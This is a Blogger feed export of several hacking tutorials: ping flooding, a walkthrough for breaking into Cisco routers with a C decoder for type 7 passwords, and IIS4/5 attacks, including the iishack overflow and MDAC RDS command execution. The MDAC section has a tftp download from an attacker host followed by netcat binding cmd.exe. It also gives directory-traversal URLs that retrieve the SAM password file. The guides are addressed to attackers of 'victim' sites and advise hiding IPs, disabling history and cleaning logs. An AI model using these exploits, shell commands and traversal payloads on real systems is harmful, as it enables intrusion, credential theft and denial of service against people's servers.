First you will need to select the connection, pick "TCP/IP Winsock", and then put in the computer to communicate with, and the port #. You can tell it to listen for input by going to Call&gt;Wait for Call. Now the other computer can connect to you on that port, and you can chat and transfer files.&lt;br /&gt;&lt;br /&gt;----------------------------------&lt;br /&gt;&lt;br /&gt;How to use Ping:&lt;br /&gt;&lt;br /&gt;Ping is easy: just open the MS-DOS prompt, and type "ping ip.address". By default it will ping 3 times, but you can type&lt;br /&gt;&lt;br /&gt;"ping ip.address -t"&lt;br /&gt;&lt;br /&gt;which will make it ping forever. To change the ping size do this:&lt;br /&gt;&lt;br /&gt;"ping -l (size) ip.address"&lt;br /&gt;&lt;br /&gt;What ping does is send a packet of data to a computer, then see how long it takes to be returned, which determines the computer's connection speed, and the time that it takes for a packet to go back and forth (this is called the "trip time"). Ping can also be used to slow down or even crash a system if the system is overloaded by ping floods. Windows 98 crashes after one minute of ping flooding (its connection buffer overflows - too many connections are registered, and so Windows decides to take a little vacation). A ping flood attack takes a lot of bandwidth from you, and you must have more bandwidth than your target (unless the target is a Windows 98 box and you have an average modem, that way you'll knock it down after approximately a single minute of ping flooding).
Ping flooding isn't effective against stronger targets, unless you have quite a few evil lines to yourself, and you have control over a few bandwidth-savvy hosts that can ping flood your target as well.&lt;br /&gt;Note: DOS's -t option doesn't do a ping flood, it just pings the target continuously, with intervals from one ping to another. In every Unix or Linux distribution, you can use ping -f to do a real ping flood. Actually ping -f is required if you want your distribution to be POSIX-compliant (POSIX - Portable Operating System Interface based on uniX), otherwise it's not a real Unix/Linux distribution, so if you have an OS that calls itself either Unix or Linux, it has the -f switch.&lt;br /&gt;&lt;br /&gt;----------------------------------&lt;br /&gt;&lt;br /&gt;How to use TraceRoute:&lt;br /&gt;&lt;br /&gt;To trace your connection (and see all the computers between you and a target), just open the MS-DOS prompt, and type "tracert ip.address" and you will see a list of computers, which are between you and the target computer.&lt;br /&gt;&lt;br /&gt;You can use this to determine if there are firewalls blocking anything. It will also allow you to determine someone's ISP (internet service provider).&lt;br /&gt;&lt;br /&gt;To determine the ISP, simply look at the IP address before the last one; this should be one of the ISP's routers.&lt;br /&gt;&lt;br /&gt;Basically, this is how traceroute works - a TCP/IP packet has a value in its header (it's in the IP header. If you don't know what this means, then ignore it and continue reading, it's not that crucial) called TTL, which stands for Time To Live. Whenever a packet hops (travels through a router) its TTL value is decreased by one.
This is just a countermeasure against the possibility that something would go wrong and a packet would ricochet all around the net, thus wasting bandwidth.&lt;br /&gt;So when a packet's TTL reaches zero, it dies and an ICMP error is sent back to the sender.&lt;br /&gt;Now, traceroute first sends a packet with a TTL value of 1. The packet quickly returns, and by looking at the sender's address in the ICMP error's header, traceroute knows where the packet has been in its first hop. Then it sends a packet with a TTL value of 2, and it returns after the second hop, revealing its identity. This goes on until the packet reaches its destination.&lt;br /&gt;&lt;br /&gt;Now isn't that fun? :-)&lt;br /&gt;&lt;br /&gt;----------------------------------&lt;br /&gt;&lt;br /&gt;How to use a proxy server:&lt;br /&gt;&lt;br /&gt;Do a search on the web for a proxy server which runs on the port of your choice. Once you find one, connect to it with either telnet or HyperTerminal and then connect to another computer through the proxy server. This way the computer at the other end will not know your IP address.&lt;br /&gt;&lt;br /&gt;----------------------------------&lt;br /&gt;&lt;br /&gt;Section 1: why hack a Cisco router?&lt;br /&gt;&lt;br /&gt;You are probably wondering... why hack into a Cisco router?&lt;br /&gt;&lt;br /&gt;The reason is that they are useful when it comes to breaking into other systems...&lt;br /&gt;&lt;br /&gt;Cisco routers are very fast, some with 18 T1 connections on one system, and they are very flexible and can be used in DoS attacks or to hack other systems, since most of them run telnet.&lt;br /&gt;&lt;br /&gt;They also have thousands of packets going through them at any one time, which can be captured and decoded... 
A lot of Cisco routers are also trusted systems, and will let you have a certain amount of access to other computers on their network.&lt;br /&gt;&lt;br /&gt;----------------------------------&lt;br /&gt;&lt;br /&gt;Section 2: finding a Cisco router&lt;br /&gt;&lt;br /&gt;Finding a Cisco router is a fairly easy task; almost every ISP will route through at least one Cisco router. The easiest way to find a Cisco router is to run a traceroute from DOS (type "tracert" and then the IP address of anyone's computer). You can trace pretty much anyone, because the trace will show all of the computer systems between your computer and their computer. One of these systems will probably have "cisco" in its name. If you find one like this, copy down its IP address.&lt;br /&gt;&lt;br /&gt;Now you have the location of a Cisco router, but it may have a firewall protecting it, so you should see if it's being blocked by pinging it a couple of times; if you get the ping returned to you, it might not be blocked. Another way is to try to access some of the Cisco router's ports. You can do this simply by using telnet and opening a connection to the router on port 23. If it asks for a password but no username, you are at the router, but if it wants a username as well, you are probably at a firewall.&lt;br /&gt;&lt;br /&gt;Try to find a router without a firewall, since this tutorial is on the routers and not on how to get past the firewalls. Once you're sure you have found a good system, you should find a proxy server which will allow you to use port 23; this way your IP will not be logged by the router.&lt;br /&gt;&lt;br /&gt;---------------------------------&lt;br /&gt;&lt;br /&gt;Section 3: how to break into a Cisco router&lt;br /&gt;&lt;br /&gt;Cisco routers running v4.1 software (which currently is most of them) will be easily disabled. 
You simply connect to the router on port 23 through your proxy server, and enter a HUGE password string, something like:&lt;br /&gt;&lt;br /&gt;10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk&lt;br /&gt;&lt;br /&gt;Now wait; the Cisco system might reboot, in which case you can't hack it because it is offline. But it will probably freeze up for a period of 2-10 minutes, which you must use to get in.&lt;br /&gt;&lt;br /&gt;If neither happens, then it is not running the vulnerable software, in which case you can try several DoS attacks, like a huge ping. Go to DOS and type "ping -l 56550 cisco.router.ip -t"; this will do the same trick for you.&lt;br /&gt;&lt;br /&gt;While it is frozen, open up another connection to it from some other proxy, and put the password as "admin". The reason for this is that by default this is the router's password, and while it is temporarily disabled, it will revert to its default state.&lt;br /&gt;&lt;br /&gt;Now that you have logged in, you must acquire the password file! The systems run different software, but most will have a prompt like "htl-textil" or something. Now type "?" for a list of commands; you will see a huge list of commands, and somewhere in there you will find a transfer command. Use that to get the password file of admin (which is the current user) and send it to your own IP address on port 23. But before you do this, set up HyperTerminal to wait for a call from the Cisco router. 
Now once you send the file, HyperTerminal will ask you if you want to accept the file that this machine is sending you; say yes and save it to disk. Log out.&lt;br /&gt;&lt;br /&gt;You are now past the hardest part; give yourself a pat on the back and get ready to break that password!&lt;br /&gt;&lt;br /&gt;------------------------------&lt;br /&gt;&lt;br /&gt;Section 4: breaking the password&lt;br /&gt;&lt;br /&gt;Now that you have acquired the password file, you have to break it so you can access the router again. To do this, you can run a program like John the Ripper or something on the password file, and you may break it.&lt;br /&gt;&lt;br /&gt;This is the easiest way, and the way I would recommend. Another way would be to try and decrypt it. For this you will need some decryption software, a lot of patience, and some of the decryption sequences.&lt;br /&gt;&lt;br /&gt;Here is a sequence for decrypting a Cisco password; you have to compile this in Linux:&lt;br /&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;
#include &lt;stdlib.h&gt;&lt;br /&gt;
#include &lt;string.h&gt;&lt;br /&gt;
#include &lt;ctype.h&gt;&lt;br /&gt;
&lt;br /&gt;
/* Cisco "type 7" key stream; the two-digit seed at the start of the string is the index into it. */&lt;br /&gt;
static const unsigned char xlat[] = {&lt;br /&gt;
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,&lt;br /&gt;
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,&lt;br /&gt;
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
static const char pw_str1[] = "password 7 ";&lt;br /&gt;
static const char pw_str2[] = "enable-password 7 ";&lt;br /&gt;
&lt;br /&gt;
static const char *pname;&lt;br /&gt;
&lt;br /&gt;
/* Decode a type 7 string "SSHHHH...": SS is the decimal seed, each HH is one&lt;br /&gt;
 * password byte XORed with xlat[seed + n]. Returns 0 on success, -1 on&lt;br /&gt;
 * malformed input. dec_pw must have room for sizeof(xlat) + 1 bytes. */&lt;br /&gt;
static int cdecrypt(const char *enc_pw, char *dec_pw)&lt;br /&gt;
{&lt;br /&gt;
size_t len = strlen(enc_pw), i, out = 0;&lt;br /&gt;
unsigned int seed, val = 0;&lt;br /&gt;
&lt;br /&gt;
if (len &lt; 2 || (len &amp; 1))&lt;br /&gt;
return -1;&lt;br /&gt;
if (!isdigit((unsigned char)enc_pw[0]) || !isdigit((unsigned char)enc_pw[1]))&lt;br /&gt;
return -1;&lt;br /&gt;
&lt;br /&gt;
seed = (enc_pw[0] - '0') * 10 + (enc_pw[1] - '0');&lt;br /&gt;
if (seed &gt; 15)&lt;br /&gt;
return -1;&lt;br /&gt;
&lt;br /&gt;
/* Every hex pair needs a key byte; reject input that would read past xlat. */&lt;br /&gt;
if (seed + (len - 2) / 2 &gt; sizeof(xlat))&lt;br /&gt;
return -1;&lt;br /&gt;
&lt;br /&gt;
for (i = 2; i &lt; len; i++) {&lt;br /&gt;
int c = toupper((unsigned char)enc_pw[i]);&lt;br /&gt;
&lt;br /&gt;
if (isdigit(c))&lt;br /&gt;
val = val * 16 + (c - '0');&lt;br /&gt;
else if (c &gt;= 'A' &amp;&amp; c &lt;= 'F')&lt;br /&gt;
val = val * 16 + (c - 'A' + 10);&lt;br /&gt;
else&lt;br /&gt;
return -1;&lt;br /&gt;
&lt;br /&gt;
if (i &amp; 1) { /* second digit of a pair: emit the decoded byte */&lt;br /&gt;
dec_pw[out++] = (char)(val ^ xlat[seed++]);&lt;br /&gt;
val = 0;&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
dec_pw[out] = '\0';&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
static void usage(void)&lt;br /&gt;
{&lt;br /&gt;
fprintf(stdout, "Usage: %s -p &lt;encrypted password&gt;\n", pname);&lt;br /&gt;
fprintf(stdout, " %s &lt;router config file&gt; &lt;output file&gt;\n", pname);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
int main(int argc, char **argv)&lt;br /&gt;
{&lt;br /&gt;
FILE *in = stdin, *out = stdout;&lt;br /&gt;
char line[257];&lt;br /&gt;
char passwd[sizeof(xlat) + 1];&lt;br /&gt;
size_t i, pw_pos;&lt;br /&gt;
int c = 0;&lt;br /&gt;
&lt;br /&gt;
pname = argv[0];&lt;br /&gt;
&lt;br /&gt;
if (argc &gt; 1) {&lt;br /&gt;
if (argc &gt; 3) {&lt;br /&gt;
usage();&lt;br /&gt;
exit(1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
if (argv[1][0] == '-') {&lt;br /&gt;
switch (argv[1][1]) {&lt;br /&gt;
case 'h':&lt;br /&gt;
usage();&lt;br /&gt;
break;&lt;br /&gt;
&lt;br /&gt;
case 'p':&lt;br /&gt;
if (argc &lt; 3 || cdecrypt(argv[2], passwd)) {&lt;br /&gt;
fprintf(stderr, "Error.\n");&lt;br /&gt;
exit(1);&lt;br /&gt;
}&lt;br /&gt;
fprintf(stdout, "password: %s\n", passwd);&lt;br /&gt;
break;&lt;br /&gt;
&lt;br /&gt;
default:&lt;br /&gt;
fprintf(stderr, "%s: unknown option.\n", pname);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
if ((in = fopen(argv[1], "rt")) == NULL)&lt;br /&gt;
exit(1);&lt;br /&gt;
if (argc &gt; 2)&lt;br /&gt;
if ((out = fopen(argv[2], "wt")) == NULL)&lt;br /&gt;
exit(1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
/* Copy the config through, decoding "password 7" lines on the way. */&lt;br /&gt;
while (1) {&lt;br /&gt;
i = 0;&lt;br /&gt;
while (i &lt; 256 &amp;&amp; (c = fgetc(in)) != EOF &amp;&amp; c != '\n') {&lt;br /&gt;
if (c != '\r') /* drop the CR of DOS line endings */&lt;br /&gt;
line[i++] = (char)c;&lt;br /&gt;
}&lt;br /&gt;
if (c == EOF &amp;&amp; i == 0) {&lt;br /&gt;
fclose(in);&lt;br /&gt;
fclose(out);&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
line[i] = '\0';&lt;br /&gt;
pw_pos = 0;&lt;br /&gt;
&lt;br /&gt;
if (!strncmp(line, pw_str1, strlen(pw_str1)))&lt;br /&gt;
pw_pos = strlen(pw_str1);&lt;br /&gt;
&lt;br /&gt;
if (!strncmp(line, pw_str2, strlen(pw_str2)))&lt;br /&gt;
pw_pos = strlen(pw_str2);&lt;br /&gt;
&lt;br /&gt;
if (!pw_pos) {&lt;br /&gt;
fprintf(out, "%s\n", line);&lt;br /&gt;
continue;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
if (cdecrypt(&amp;line[pw_pos], passwd)) {&lt;br /&gt;
fprintf(stderr, "Error.\n");&lt;br /&gt;
exit(1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
fprintf(out, "%s%s\n", pw_pos == strlen(pw_str1) ? pw_str1 : pw_str2, passwd);&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;&lt;br /&gt;If you do not have Linux, then the only way to break the password is to run a dictionary or brute-force attack on the file with John the Ripper or another password cracker.&lt;br /&gt;&lt;br /&gt;-------------------------------&lt;br /&gt;&lt;br /&gt;Section 5: using the router&lt;br /&gt;&lt;br /&gt;To use this wonderful piece of technology, you will have to be able to connect to it; use a proxy if you do not want your IP logged. Once you have logged in, you'll want to disable the history so no one can look at what you were doing: type in "terminal history size 0". Now it won't remember anything! Type "?" for a list of all of the router's commands, and you will be able to use most of them. 
&lt;br /&gt;&lt;br /&gt;These routers usually have telnet, so you can use telnet to connect to other systems (like Unix boxes) and hack into them. It is also equipped with ping and traceroute, which you can use to trace systems or do DoS attacks. You may also be able to use it to intercept packets, but I do not recommend this, as it will not always work and may get you noticed....&lt;br /&gt;&lt;br /&gt;---------------------------------&lt;br /&gt;&lt;br /&gt;If you don't hack a Cisco your first time, don't worry... you probably won't do it the first time, or even the second. It takes practice and patience. This is just to show you how... And make sure you are going after something that is LEGAL.</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/819619244289531499/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=819619244289531499' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/819619244289531499'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/819619244289531499'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/exploiting-cisco-systems.html' title='Exploiting cisco systems'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-6759228808617507709</id><published>2007-12-02T01:16:00.000-08:00</published><updated>2007-12-02T01:21:46.259-08:00</updated><title type='text'>Hacking iis tutorial</title><content type='html'>Foreword:&lt;br /&gt;This text goes out to all those NT hackers out there. It is based on the info I have from the eEye Digital Security Team, which found the exploit, and on my own experience.&lt;br /&gt;Note: All the files used in this paper can be found at the main page.&lt;br /&gt;&lt;br /&gt;According to the eEye Digital Security Team the systems affected include:&lt;br /&gt;&lt;br /&gt;Internet Information Server 4.0 (IIS4)&lt;br /&gt;Microsoft Windows NT 4.0 SP3 Option Pack 4&lt;br /&gt;Microsoft Windows NT 4.0 SP4 Option Pack 4&lt;br /&gt;Microsoft Windows NT 4.0 SP5 Option Pack 4&lt;br /&gt;&lt;br /&gt;I performed the attack from a Windows NT 4.0 machine with the required programs:&lt;br /&gt;&lt;br /&gt;iishack.exe&lt;br /&gt;ncx.exe or ncx99.exe or BertzSvc.exe&lt;br /&gt;&lt;br /&gt;Ncx.exe is a hacked-up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its argument, which means that it binds cmd.exe to port 80. The eEye people have received some reports from people not being able to use ncx.exe, so they have made another hacked-up version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason why ncx.exe doesn't work sometimes is that inetinfo.exe has to be exited before it can work. Ncx.exe fits under the description Trojan horse! To kick inetinfo.exe use avoid.exe (which will also soon be available at the web site). BertzSvc.exe binds cmd.exe to port 123 instead.&lt;br /&gt;How to do it:&lt;br /&gt;First of all you'll need a server running IIS4, NT4 and/or SP3/4/5 + OP4. 
To find such, go to www.netcraft.com or your favorite “what's-this-site-running-search-engine” and find a victim running the affected system. Second, you need to craft a buffer overrun of about 3 k on the target machine!&lt;br /&gt;Then launch iishack.exe via the command prompt in WinNT.&lt;br /&gt;&lt;br /&gt;Output:&lt;br /&gt;&lt;br /&gt;--------(IIS 4.0 remote buffer overflow exploit)----------&lt;br /&gt;(c) dark spyrit -- barns@eeye.com. http://www.eEye.com&lt;br /&gt;&lt;br /&gt;[usage: iishack &lt;host&gt; &lt;port&gt; &lt;url&gt; ]&lt;br /&gt;eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe&lt;br /&gt;do not include 'http://' before hosts!&lt;br /&gt;----------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Then issue the command as in the example beneath:&lt;br /&gt;&lt;br /&gt;C:\&gt;iishack www.victim.com 80 YourOwnIpAddress/ncx.exe&lt;br /&gt;&lt;br /&gt;Output (if successful):&lt;br /&gt;&lt;br /&gt;Data sent!&lt;br /&gt;&lt;br /&gt;Note: Give it (the IIS) enough time to download ncx.exe. Hint: Use Rasmon.exe to monitor your outgoing bytes.&lt;br /&gt;&lt;br /&gt;After that type telnet www.victim.com 80 in cmd.exe or in the Start/Run menu.&lt;br /&gt;&lt;br /&gt;Output:&lt;br /&gt;&lt;br /&gt;Microsoft(R) Windows NT(TM)&lt;br /&gt;(C) Copyright 1985-1996 Microsoft Corp.&lt;br /&gt;&lt;br /&gt;C:\&gt;&lt;br /&gt;&lt;br /&gt;Voila! Access granted!&lt;br /&gt;Do whatever you wanna do, but remember to:&lt;br /&gt;&lt;br /&gt;- add a scheduled task to restart inetinfo.exe in X minutes (the AT command will do it)&lt;br /&gt;- add a scheduled task to delete ncx.exe in X-1 minutes.&lt;br /&gt;- clean the log files (if there are any).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Corrections, suggestions or comments are accepted here&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------&lt;br /&gt;Hi Folks,&lt;br /&gt;I have just compiled the well-known IIS tricks. 
I hope it will be helpful for securing your server.&lt;br /&gt;Any comment, suggestion or insult...? Welcome.&lt;br /&gt;MAB-&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SECURING IIS by BREAKING&lt;br /&gt;=====================================================&lt;br /&gt;by Mount Ararat Blossom&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;9/15/2000&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;mount_ararat_blossom@hotmail.com&lt;br /&gt;=====================================================&lt;br /&gt;01- Abstract&lt;br /&gt;I am not sure what you want to get out of this, but basically this paper is intended merely on breaking IIS web servers, especially versions 4.0 and 5.0, via TCP/IP over port 80. These techniques work against even so-called secure networks, just because every network, even those secured ones, lets HTTP connections in.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=====================================================&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;02- Intro&lt;br /&gt;Alright, so you all wanna know how to break into IIS web servers? First off, you should find a CGI scanner so that things will get easier. My personal preferences are&lt;br /&gt;"whisker" by "rain forest puppy" (www.wiretrip.net/rfp).&lt;br /&gt;"cis" by "mnemonix" (www.cerberus-infosec.co.uk)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To understand which server is running on the victim site:&lt;br /&gt;telnet &lt;victim&gt; 80&lt;br /&gt;GET HEAD / HTTP/1.0&lt;br /&gt;and there you go with the name and the version of the web server. However, some sites might run their web servers over 8080, 81, 8000, 8001, and so on.&lt;br /&gt;To understand SSL web servers, which provide encryption between the web server and the browser, we use the tool "ssleay":&lt;br /&gt;s_client -connect &lt;victim&gt;:443&lt;br /&gt;HEAD / HTTP /1.0&lt;br /&gt;and here we go again. 
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As I am writing this I am hoping that you will be able to use this to secure your web servers instead of using this to break into others.&lt;br /&gt;=====================================================&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;03- Game Starts&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;========IIS HACK=====&lt;br /&gt;The folks at www.eeye.com have found a vulnerability in IIS 4.0 which allows us to upload a crafted version of netcat (the hacker's Swiss army knife) onto the victim server and bind a cmd.exe on port 80.&lt;br /&gt;The vulnerability was a buffer overflow in .htr, .idc and .stm files. The problem is with insufficient bounds checking of the names in the URL for .htr, .stm and .idc files, allowing hackers to insert some backdoors to download and execute arbitrary commands on the local system as the administrator user.&lt;br /&gt;To hack the victim site we need&lt;br /&gt;iishack.exe&lt;br /&gt;ncx.exe (you can find these two at www.technotronic.com)&lt;br /&gt;plus we need a web server running on our attacking box.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;First off, run the web server on your attacking box and place ncx.exe in your root directory.&lt;br /&gt;Then run iishack.exe against the victim site:&lt;br /&gt;c:\&gt;iishack.exe &lt;victim&gt; 80 &lt;evil_hacker&gt;/ncx.exe&lt;br /&gt;Then here we go, go and get your Swiss army knife, namely netcat:&lt;br /&gt;c:\&gt;nc &lt;victim&gt; 80 ==============&gt;&gt;&gt;BOOM!&lt;br /&gt;The command prompt from the victim site suddenly appears on your box!!!&lt;br /&gt;D:\&gt; or whatever it is, C:, E:...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Do you want me to explain what to do next? Hey, come on, you must be kidding ...hehe.... 
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=========MDAC- Local Command Execution===========&lt;br /&gt;You might think that it is a years-old vulnerability; however, what I see on pen-tests is that almost 40% of IIS web servers are still vulnerable to this.&lt;br /&gt;IIS' MDAC component has a vulnerability where an attacker can submit commands for local execution.&lt;br /&gt;The core problem is with the RDS DataFactory. By default, it allows remote commands to be sent to the IIS server. The commands will be run as the effective user of the service, which is typically the SYSTEM user.&lt;br /&gt;I won't get into details; if you want, go and check RFP's web site. However, you can find a vulnerable site by checking&lt;br /&gt;c:\&gt;nc -nw -w 2 &lt;victim&gt; 80&lt;br /&gt;GET /msadc/msadcs.dll HTTP&lt;br /&gt;and if you get the following&lt;br /&gt;application/x_varg&lt;br /&gt;it is most probably vulnerable if not patched.&lt;br /&gt;You can find the exploit, mdac.pl and msadc2.pl, on rain forest puppy's web site at www.wiretrip.net/rfp. It checks for the vulnerability, and if it is vulnerable then it asks for the command you wanna execute:&lt;br /&gt;c:\&gt; mdac.pl -h &lt;victim&gt;&lt;br /&gt;Please type the NT commandline you want to run (cmd /c assumed):\n&lt;br /&gt;cmd /c&lt;br /&gt;If you wanna change the web site which is located at&lt;br /&gt;d:\inetpub\wwwroot\victimweb\index.htm&lt;br /&gt;then you can type:&lt;br /&gt;cmd/c echo hacked by me &gt; d:\inetpub\wwwroot\victimweb\index.htm&lt;br /&gt;or whatever you want, but my personal preference is uploading our Swiss army knife, netcat, and binding it with cmd.exe to port 80. To do that I set up my TFTP server and put nc.exe in it. 
Then when I am asked to type the command I want to execute, I type the following:&lt;br /&gt;cmd/c cd %systemroot%&amp;&amp;tftp -i &lt;evil_hacker&gt; GET nc.exe&amp;&amp;del ftptmp&lt;br /&gt;&amp;&amp; attrib -r nc.exe&amp;&amp;nc.exe -l -p 80 -t -e cmd.exe&lt;br /&gt;There you go; go on, fire your netcat against the victim over port 80, and you get the eggshell, cmd.exe.....&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=========Codebrws.asp &amp; Showcode.asp ==================&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Codebrws.asp and Showcode.asp are viewer files that ship with Microsoft IIS, but are not installed by default. The viewer is intended to be installed by the administrator to allow for the viewing of sample files as a learning exercise; however, the viewer does not restrict what files can be accessed. A remote attacker can exploit this vulnerability to view the contents of any file on the victim's server. However, there are several issues to be aware of:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Codebrws.asp and showcode.asp are not installed by default.&lt;br /&gt;2. The vulnerability only allows for viewing of files.&lt;br /&gt;3. The vulnerability does not bypass Windows NT Access Control Lists (ACLs).&lt;br /&gt;4. Only files in the same disk partition can be viewed.&lt;br /&gt;5. Attackers must know the location of the requested file. 
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Let's say you wanna see the code of codebrws.asp. Request the following from your favorite web browser:&lt;br /&gt;http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp&lt;br /&gt;Then you will see the source code of codebrws.asp.&lt;br /&gt;For using showcode.asp, do the following, again from your infamous browser:&lt;br /&gt;http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/repair/sam._&lt;br /&gt;There you go, you get the infamous sam._ file; copy it, expand it and crack it using L0phtCrack, my personal choice, and you will get all user passwords, even the administrator one.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=========Null.htw===============&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Microsoft IIS running with Index Server contains a vulnerability through Null.htw even if no .htw files exist on the server. The vulnerability displays the source code of an ASP page or other requested file. The ability to view ASP pages could provide sensitive information such as usernames and passwords. An attacker providing IIS with a malformed URL request could escape the virtual directory, providing access to the logical drive and root directory. The "hit-highlighting" function in the Index Server does not adequately restrain what types of files may be requested, allowing an attacker to request any file on the server. Microsoft has released a patch for Windows 2000 addressing this vulnerability.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The Null.htw function has 3 variables which get their input from the user. These variables are as follows, respectively:&lt;br /&gt;CiWebhitsfile&lt;br /&gt;CiRestriction&lt;br /&gt;CiHiliteType 
&lt;br /&gt;Say that we wanna see the source code of default.asp; then type the following from your favorite browser:&lt;br /&gt;http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&amp;%20CiRestriction=none%20&amp;%20&amp;CiHiliteType=full&lt;br /&gt;and you will get the source of the default.asp file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;========webhits.dll &amp; .htw================&lt;br /&gt;The hit-highlighting functionality provided by Index Server allows a web user to have a document with their original search terms highlighted on the page. The name of the document is passed to the .htw file with the CiWebhitsfile argument. Webhits.dll, the ISAPI application that deals with the request, opens the file, highlights accordingly and returns the resulting page. As the user has control of the CiWebhitsfile argument passed to the .htw file, they can request anything they want. And the real problem is that they can view the source of ASP and other scripted pages.&lt;br /&gt;To understand whether you are vulnerable, request the following from the site:&lt;br /&gt;http://www.victim.com/nosuchfile.htw&lt;br /&gt;If you get the following from the server&lt;br /&gt;format of the QUERY_STRING is invalid&lt;br /&gt;it means that you are vulnerable.&lt;br /&gt;The problem is because of webhits.dll (an ISAPI application) associated with .htw files. 
You can find the .htw files in the following locations of the infamous IIS web server:&lt;br /&gt;/iissamples/issamples/oop/qfullhit.htw&lt;br /&gt;/iissamples/issamples/oop/qsumrhit.htw&lt;br /&gt;/isssamples/exair/search/qfullhit.htw&lt;br /&gt;/isssamples/exair/search/qsumrhit.htw&lt;br /&gt;/isshelp/iss/misc/iirturnh.htw (this is normally for loopback)&lt;br /&gt;An attacker can, for instance, view the contents of the sam._ file as follows:&lt;br /&gt;http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?ciwebhitsfile=/../../winnt/repair/sam._&amp;cirestriction=none&amp;cihilitetype=full&lt;br /&gt;will reveal the contents of the sam._ file, which is binary; you should copy it, expand it and crack it as I explained several times before.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;===ASP Alternate Data Streams(::$DATA)==================&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The $DATA vulnerability, published in mid-1998, results from an error in the way the Internet Information Server parses file names. $DATA is an attribute of the main data stream (which holds the "primary content") stored within a file on the NT File System (NTFS). By creating a specially constructed URL, it is possible to use IIS to access this data stream from a browser. Doing so will display the code of the file containing that data stream and any data that file holds. This method can be used to display a script-mapped file that can normally be acted upon only by a particular Application Mapping. The contents of these files are not ordinarily available to users. However, in order to display the file, the file must reside on the NTFS partition and must have ACLs set to allow at least read access; the unauthorized user must also know the file name. 
